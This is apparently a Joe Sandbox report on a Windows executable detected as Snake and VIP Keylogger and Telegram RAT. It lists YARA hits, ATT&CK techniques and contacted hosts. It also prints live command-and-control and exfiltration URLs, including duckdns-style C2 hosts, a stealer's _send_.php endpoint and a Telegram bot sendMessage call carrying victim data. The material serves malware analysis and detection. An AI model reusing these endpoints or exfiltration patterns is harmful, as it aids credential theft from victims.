Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	63%	ReversingLabs	ByteCode-MSIL.Infostealer.LokiBot
SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
https://www.office.com/lB	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enlB	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	193.122.6.168	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown
time.windows.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033BA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/lB	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033B5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003388000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003379000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033BA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003383000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003242000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1379596855.00000000024C2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003242000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518592
Start date and time:	2024-09-25 21:53:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/6@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 79 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.101.57.9
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Simulations

Behavior and APIs

Time	Type	Description
15:54:17	API Interceptor	11309087x Sleep call for process: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe modified
15:54:19	API Interceptor	12x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2wnz/
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/DiF66Hbf/download
	http://easyantrim.pages.dev/id.html	Get hash	malicious	HTMLPhisher	Browse	easyantrim.pages.dev/id.html
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/13rSMZZi/download
	Purchase Order_ AEPL-2324-1126.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/yhsl/
	PO-001.exe	Get hash	malicious	FormBook	Browse	www.x0x9x8x8x7x6.shop/assb/
	PO2024033194.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/
	ADNOC REQUESTS & reviews.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
193.122.6.168	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	FAKTURA_.EXE.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	checkip.dyndns.org/
	rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rBSH200924_pdf.cmd.exe	Get hash	malicious	VIP Keylogger	Browse	checkip.dyndns.org/
	rcontractorder.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	rdoc17000320240923070456.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SKMBT_C22024082310420.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Swftsend8964,pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	TRANSFERENCIA.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
checkip.dyndns.com	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.130.0
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
